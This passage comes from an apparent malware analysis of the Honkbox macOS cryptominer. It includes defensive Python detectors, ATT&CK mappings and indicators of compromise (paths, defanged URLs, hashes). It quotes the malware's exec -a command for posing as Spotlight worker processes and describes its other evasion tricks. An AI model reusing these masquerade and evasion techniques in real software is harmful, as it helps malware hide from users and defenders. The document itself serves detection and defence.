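SUSPECT_DIRS = ("/usr/local/bin/", "/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
APPLE_DIRS = ("/System/", "/usr/libexec/", "/usr/bin/", "/usr/sbin/", "/Library/Apple/")


def daemon_target(d: dict) -> str:
    """Program to run: the Program key wins, else ProgramArguments[0]."""
    args = d.get("ProgramArguments") or []
    return d.get("Program") or (args[0] if args else "")


def audit_launch_daemon(plist_bytes: bytes) -> list:
    d = plistlib.loads(plist_bytes)
    label = d.get("Label", "<no label>")
    target = daemon_target(d)
    findings = []
    if d.get("RunAtLoad") and target.startswith(SUSPECT_DIRS):
        findings.append(f"{label}: RunAtLoad daemon executes {target} from a user-writable path")
    if target.endswith(".sh"):
        findings.append(f"{label}: daemon target is a shell script ({target})")
    if label.startswith("com.apple.") and not target.startswith(APPLE_DIRS):
        findings.append(f"{label}: Apple-style label but program outside system paths ({target})")
    return findings


def audit_directory(path: str = "/Library/LaunchDaemons") -> dict:
    """Run the audit over every .plist in a LaunchDaemons folder (live use on macOS)."""
    report = {}
    for name in sorted(os.listdir(path)):
        if not name.endswith(".plist"):
            continue
        with open(os.path.join(path, name), "rb") as fh:
            findings = audit_launch_daemon(fh.read())
        if findings:
            report[name] = findings
    return report


def _plist(label: str, program: str) -> bytes:
    """Build a constructed RunAtLoad daemon plist for the demo."""
    return plistlib.dumps({
        "Label": label,
        "ProgramArguments": [program],
        "RunAtLoad": True,
        "LaunchOnlyOnce": True,
    })


# constructed after the plists / paths the post describes
HONKBOX_A_PLIST = _plist("com.ableton.LiveEventd", "/usr/local/bin/liveeventd.sh")
ACC_INSTALLER_PLIST = _plist("com.apple.acc.installer.v1", "/usr/local/bin/com.apple.acc.installer.v1")
BENIGN_PLIST = _plist("com.example.agent", "/Library/Application Support/Example/agentd")

if __name__ == "__main__":
    for name, blob in [("ableton", HONKBOX_A_PLIST), ("acc", ACC_INSTALLER_PLIST), ("benign", BENIGN_PLIST)]:
        print(name, audit_launch_daemon(blob) or "clean")
```

`audit_directory()` needs read access to /Library/LaunchDaemons and is only meaningful on macOS; everything else runs anywhere. A hit is a lead, not a verdict: plenty of legitimate third-party daemons run scripts from /usr/local/bin, so pair a finding with the code-signing status of the target and the hashes listed below.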

Behavior in Honkbox Versions B and C is quite different. These forgo persistence of any kind, presumably in an attempt to be more stealthy and avoid detection. Instead, the malware authors rely on the user’s desire to use the trojanized software on a regular basis. How successful that is in turn depends on whether the user, security software or macOS recognizes the application as trojanized.

Code signing checks, which in macOS Ventura take place every time an app is launched, will prevent a doctored app from executing. However, there are other ways to run unsigned or ad hoc signed code on even the latest version of macOS, including on ARM64 (aka M1, M2) processors, so expect to see the malware authors adapt to bypass these restrictions in future.

Another detection evasion mechanism relies on using the shell’s exec builtin to launch a process and replace its actual name with a name supplied by the malware code via the -a option.

In Honkbox B and C variants, this behavior can be seen in the strings hard coded into the binary, where the name of a system binary is passed to the shell in lieu of the process’s actual name.

(( exec -a "/System/Library/Frameworks/CoreServices.framework/Frameworks/Metadata.framework/Versions/N/Support/mdworker_shared" "$0" ) & 
echo $! > "/tmp/i2pd/._pid")

Only variants B and C use this technique. Both masquerade as legitimate processes mdworker_shared (Honkbox_B) or mdworker_watchd (Honkbox_C) and mdworker_local (both).

Variant B above; Variant C below. Both use exec -a to masquerade as other processes
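Because exec -a only rewrites argv[0], the binary actually running stays on disk under its real path; comparing the two is how a hunter exposes the masquerade. The function below is an added example, not code from the post. It takes records of (pid, real executable path, argv[0]); collecting them is left to the reader (argv from `ps -axo pid=,args=`, the executable path from a per-pid lookup) and the records at the bottom are constructed, including the /private/tmp path of the masquerading process, which the post does not give.

```python
"""Spot processes that use the exec -a trick the post describes.

Added example (not from the post). Input: (pid, real executable path,
argv[0]) records; SAMPLE_PROCS is constructed. The Honkbox argv[0] basenames
come from the post's IoC list.
"""
import os

# argv[0] basenames Honkbox_B / _C present, from the post's IoC list
HONKBOX_ARGV0 = {"mdworker_local", "mdworker_shared", "mdworker_watchd"}


def flag_masquerades(procs) -> list:
    findings = []
    for pid, exe, argv0 in procs:
        if not argv0.startswith("/"):
            continue                  # relative argv[0] (e.g. "-zsh") is normal and uninformative
        if os.path.normpath(argv0) == os.path.normpath(exe):
            continue                  # claimed path matches the binary actually running
        claimed = os.path.basename(argv0)
        if claimed in HONKBOX_ARGV0:
            reason = f"claims Spotlight worker name {claimed!r} used by Honkbox"
        elif argv0.startswith("/System/") and not exe.startswith("/System/"):
            reason = "claims a /System/ path but runs from outside /System/"
        else:
            reason = "argv[0] is an absolute path that differs from the executable"
        findings.append({"pid": pid, "exe": exe, "argv0": argv0, "reason": reason})
    return findings


# ---- constructed records ----
MD_SUPPORT = ("/System/Library/Frameworks/CoreServices.framework/Frameworks/"
              "Metadata.framework/Versions/A/Support/")
FAKE_EXE = "/private/tmp/._example/x00"      # assumed location of the masquerading binary

SAMPLE_PROCS = [
    (410, MD_SUPPORT + "mdworker_shared", MD_SUPPORT + "mdworker_shared"),   # genuine worker
    (411, "/bin/zsh", "-zsh"),                                               # login shell, ignored
    (5821, FAKE_EXE, MD_SUPPORT.replace("/A/", "/N/") + "mdworker_shared"),  # exec -a masquerade
    (5822, FAKE_EXE, MD_SUPPORT.replace("/A/", "/N/") + "mdworker_local"),   # exec -a masquerade
    (5823, "/Users/alice/Downloads/tool", "/System/Library/CoreServices/example"),  # generic case
]

if __name__ == "__main__":
    for f in flag_masquerades(SAMPLE_PROCS):
        print(f"pid {f['pid']}: {f['reason']}  (exe={f['exe']}, argv0={f['argv0']})")
```

The generic rule (absolute argv[0] that differs from the executable) is deliberately broad; wrappers and some package managers trip it, so treat the Honkbox-name and /System/-path reasons as the high-confidence ones and the rest as context.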

Further, the malware monitors for the launch of Activity Monitor in case the user notices and attempts to investigate any heavy CPU resources use. If Activity Monitor is detected, the malware immediately kills all its processes and quits.

Honkbox kills its processes if Activity Monitor is launched

Users wishing to launch Activity Monitor to check for malicious activity can deploy the same trick used by Honkbox mentioned earlier to circumvent this anti-detection technique. Here, we pass the name ‘top’ when we launch Activity Monitor from the command line.

exec -a top "/System/Applications/Utilities/Activity Monitor.app/Contents/MacOS/Activity Monitor"

Now the malware’s pgrep -x "Activity Monitor" code returns false and the miner and associated processes continue to run.

Of course, for those happy to use the command line, it’s equally possible to simply use the top utility or, indeed, proper security software rather than Activity Monitor.

Protecting Against Honkbox Malware

SentinelOne Singularity detects and protects against all known Honkbox variants.


For macOS users not protected by SentinelOne, it is important to ensure that XProtect has been updated to version 2166. This can be achieved by running software update in System Settings or System Preferences applications, according to the version of macOS. XProtect versioning can be checked from the command line:

grep -i -A1 shortversion `mdfind -name XProtect.bundle`/Contents/Info.plist
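The same check, scripted so a fleet can be polled for it: read CFBundleShortVersionString from the XProtect bundle's Info.plist (the key the grep above matches) and compare it with 2166. This is an added example, not code from the post; SAMPLE_INFO_PLIST is a constructed plist carrying only that key, and leading digits are taken from the version string in case a future build appends a suffix.

```python
"""Check the installed XProtect version against the Honkbox update (v2166).

Added example, not from the post. Reads the same Info.plist the grep command
inspects; SAMPLE_INFO_PLIST is constructed.
"""
import plistlib
import re

XPROTECT_INFO = "/Library/Apple/System/Library/CoreServices/XProtect.bundle/Contents/Info.plist"
HONKBOX_MIN_VERSION = 2166   # version that added HONKBOX_A / _B / _C


def xprotect_version(info_plist: bytes) -> int:
    """Return the numeric XProtect version from Info.plist bytes."""
    d = plistlib.loads(info_plist)
    m = re.match(r"\d+", str(d.get("CFBundleShortVersionString", "")))
    if not m:
        raise ValueError("CFBundleShortVersionString missing or non-numeric")
    return int(m.group(0))


def has_honkbox_signatures(version: int) -> bool:
    return version >= HONKBOX_MIN_VERSION


def check_installed(path: str = XPROTECT_INFO) -> tuple:
    """Live check on macOS: (installed version, whether it covers Honkbox)."""
    with open(path, "rb") as fh:
        v = xprotect_version(fh.read())
    return v, has_honkbox_signatures(v)


# constructed plist, not copied from a real bundle
SAMPLE_INFO_PLIST = plistlib.dumps({
    "CFBundleIdentifier": "com.apple.XProtect",
    "CFBundleShortVersionString": "2166",
})

if __name__ == "__main__":
    try:
        version, ok = check_installed()
    except FileNotFoundError:
        version, ok = xprotect_version(SAMPLE_INFO_PLIST), True
        print("XProtect bundle not found; showing the constructed sample")
    print(f"XProtect {version}: {'covers' if ok else 'does NOT cover'} Honkbox")
```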

Security teams and threat hunters should review the indicators of compromise at the end of this post.

Conclusion

Honkbox is a novel piece of macOS malware in a number of ways. Its use of I2P for tunneling and, in the recent variants, its lack of a ‘traditional’ persistence mechanism show that the authors prize stealth. The use of multiple detection evasion techniques and masquerades attempts to hide it from users even if they become suspicious. In addition, as some components of this multi-stage malware were not previously documented, it’s possible that some detection solutions may still have to catch up.

SentinelOne fully detects the Honkbox cryptominer and security teams are advised to review the indicators listed below. For more information about how SentinelOne can help protect your macOS fleet, contact us or request a demo.

MITRE ATT&CK

T1036 Process executable has a file extension which is uncommon
T1064 Executes commands using a shell commandline interpreter
T1070.004 Executes the “rm” command to delete files or directories
T1082 Reads the systems hostname
T1095 Performs DNS lookups
T1222 Executes the “chmod” command used to modify permissions
T1564 Executes the “mktemp” command to create a temporary unique file name
T1564.001 Creates and executes hidden MachO files

Indicators of Compromise

Process Names

/System/Library/Frameworks/CoreServices.framework/Frameworks/Metadata.framework/Versions/N/Support/mdworker_local
/System/Library/Frameworks/CoreServices.framework/Frameworks/Metadata.framework/Versions/N/Support/mdworker_shared
/System/Library/Frameworks/CoreServices.framework/Frameworks/Metadata.framework/Versions/N/Support/mdworker_watchd

File paths

/Library/LaunchDaemons/com.ableton.LiveEventd
/Library/LaunchDaemons/com.apple.acc.installer.v1.plist
/tmp/com.apple.acc.installer.v1.plist
/tmp/i2pd/._pid
/tmp/installv3_md5
/tmp/installv3.sh
/tmp/lauth
/usr/local/bin/com.apple.acc.installer.v1
/usr/local/bin/liveeventd
/usr/local/bin/liveeventd.sh
/usr/local/bin/livelocalserviced
~/.i2pd/tunnels.conf
~/.i2pd/tunnels.d

Localhost Ports

4543
4545
4546

Embedded URLs (Honkbox_A only)

hxxps://banana[.]incognet[.]io/
hxxps://download[.]xxlspeed[.]com/
hxxps://i2p[.]mooo[.]com/netDb
hxxps://i2p[.]novg[.]net/
hxxps://i2pseed[.]creativecowpat[.]net:8443/
hxxps://netdb[.]i2p2[.]no/
hxxps://reseed-fr[.]i2pd[.]xyz/
hxxps://reseed[.]diva[.]exchange/
hxxps://reseed[.]i2p-projekt[.]de
hxxps://reseed[.]i2pgit[.]org/
hxxps://reseed[.]memcpy[.]io/
hxxps://reseed[.]onion[.]im/
hxxps://reseed2[.]i2p[.]net/

Honkbox_A (Mach-O)

07bf3061b57605fed11a76d5c0c5503b9ae94bcb
0e3a1935dfe58f337dfc0456aeeff9571d6f799b
1e63eb81b45f5c472c3e6e7151f146e886491153
2ae591a3e14d77a9bc077fe61712c6b77f71fc11
33988b411c1064ebdc8bec2d86b7f481fea1c2fe
46b14b1818571f730883278a16065e4f6f3978f1
59efded10b3d023369d335831244303806c61d8c
5f542262af255d95a0e13f2832ffe017f6b9e4a5
608d88038296a6f810e492ad7fee3e62629437da
6329d04f81851779fc02d45565e1ead38044cde7
6751886a9d217b13362fb0533c08abbde949d1ff
687ec2b7d79ed6f953c7f519044b7117d12bdafa
68f4979c04b4753a9f275f29c00d4b260f4c2ec0
6ee76d296abf8da0f98d23f545ba4aa7c69e8211
7035ddb5c826fb86294b68e99f0a5675301cec1e
7377d8c7cd04fd6117c90a6f5ac5375eba459a78
763b43b7c52fe30b799e86909fad2ec7a8732fc6
78d3d2d61bce0871f4c8ddb6d32063c6b46dc135
8292a233fb0291b64481c08f1e88b490d1b9525a
89f2bb7f96317837514bbae70d47ac1e00626ac1
97fbb98f1ecbb2533204eca2967cf4117e388f22
a916bdd1891020ec6cb0e686338341c4d8c20251
b6be4cebb803d6245ac303bcaef3f068fa6f7033
be451edf04e68f2d4e180a64ba7bb238b5241e3e
c52d182e05615f6083a4430bf31cf8ae32485688
c59ee7dbfcfa5233d9e9321936c7fbc01424e4ba
ca31bb68d5a1aed57597c588b7420d3186ed6b95
cbf69ee83a2750a9e3614036476b5f9f936fe073
cea42a9b59cfa262453b508ea21d96f87bb793da
da6ecdcbeca15d8487d0cf4c008cd67088bdb3ad
e2488ba66347cf32ba4dbc2e75a23561d4726e80
e8cc61445f467b68e061fa8118be13de013f9f7d
e94e380224ac4e6eff728180a2f5396a3c5d0363

Honkbox_B (Mach-O)

0308445d6303d7edb5eb580edf84a59388477c82
1fb6e00edaa11f6332ae752424f9c5cfb6114deb
29cdfe14b97f748b40a87c9ced24f322afed948c
2a040318d15348c6f5c5cf37973ed365dcf7bd4f
2defaf34319b6255db45c8bebf55d5095a41bed8
38ad7a25da72e1f57bc13a74e59f2c9156fa2417
3ab040271882eb6c3a028498c7469450610ef7b8
3ded983006e3682e7c4dc3d863781f35bea92165
3e7a63a9048e35437b632db94531a81561057ce5
4292d8c9a6b861a0075895bc2bc0b8921663ed5c
43c6593e5164db602324d481c481095ad1bf1a13
4637207b424b6632163005d7c3a31a63702bb408
4bdeac2dc7d60bd7d4bf4ff075f05efbdd18030e
53bea5f857571d73b7b4a1f6db1edd340d453bca
53fd50b23372a73e74e7cdc370f51ac560a1130f
5472f9a4b101c4bcf4f2134504f0db6d7fe07ea3
5e4792e459f1107cf83ce3293141f9ba3026b015
5eebbb1a8cd3cbdb9eb98eb6719fed618ff27621
5f3ab48629914acdbaef2509a45979c185adf5b9
69fd812cf3760dc3dff5d41972cc635de9a0844d
6e150647e8c723fb001534142bc849651b7fcf43
70bdd13da250924a975346acc1c6e0700a97e8b0
7628d90cfd311bfd4997729a232ca77a6d443619
8907721154fc4079f9fc68e58c0ca742ffc1c9af
8926ad924bb12e607ca5bf029adf417e83bbc8da
8e2a8977ae86eb24e481be5623d5cc8dc47da705
8ed83d6593bb0c7404f4571c91a4a80022088922
95f71894eec20f9727ff1311ad078de38ae4e774
a0ca2803c3face7c0b4a0ef7068a8fafc85f9ff3
a605e20250e66726a58699a2ae4f7264c8c2e4e2
adc879e80397e5d8fdaf7f0a85c9472bc633ff1d
b0b6050f6d2ac661022ebb56a06e30912aca527d
b2c6556c22efc74f14219e362e75b5913b3245e1
b52f25672953d947e0a993e5f0f3c401ef87d127
b675028dcbaa538f24e8998632312e16fdf19e9b
bb71b155aefc560591032ec01f36dcb86a729ee6
bce251548798f159e99e71e68b65bbb4a9607296
bebe1ad82d595434c6ef529cb4f75f4937a04e5f
bfd8dea4de5a5171145a462f876a44eab41a0446
c10079ed5885c64c0da6302bc91adf5b293aef4c
c19e78df3b3462064b9d78bc138674a7e8df28c7
cd0c78f24eb1f636708d957dcf71196c6260b244
cf685bb0fe5e078ea28a25a7cf8774b168787db4
d0e93f73ddc8c9c148ac16d480272e705ff22364
d15cdac63c5227836196c03850b35f374166bda3
d510b4c602404767f9ef75f5a48017d2b3743c4c
d86695fb9e56e03253503781f42f1069a5cc10d1
e12cb82b4393dc61275622d691393056d278c984
ec22e64817ca6c92ecbe5279d4536d506ed2e37e
edd9643709c5fb7da9ef3eec569ffbc1bd440fed
f03c06b937918ad0f7dc70c6c0238997429bae73
f12c739b4261d4d7d155621f61f01f0d833df40f
f296917562ec7137c6c70e81ef31c73c549bd082
f3ae686e1bc85ff68962e2a1a83d2b48ecf3072a
f6348b7b79e48b5d2c13b8aa560c795d7a2c21d8

Honkbox_C (Mach-O)

1214ccc069d0ff00dd3c3e1ec8e2bcc067245d9e
152b53cf3987a2f775b1f4af4cc6a0ca9597027c
18f7c4a44129fb4410b3f5c216c376c6a7636f6a
1b621d675e3b8cadbdbdddbf226647da8ad2420a
22f70b0452212fc478e7d809d9f4c07049dfc900
4fd50fc1cf73d614f59b7d454feebe40887d65e7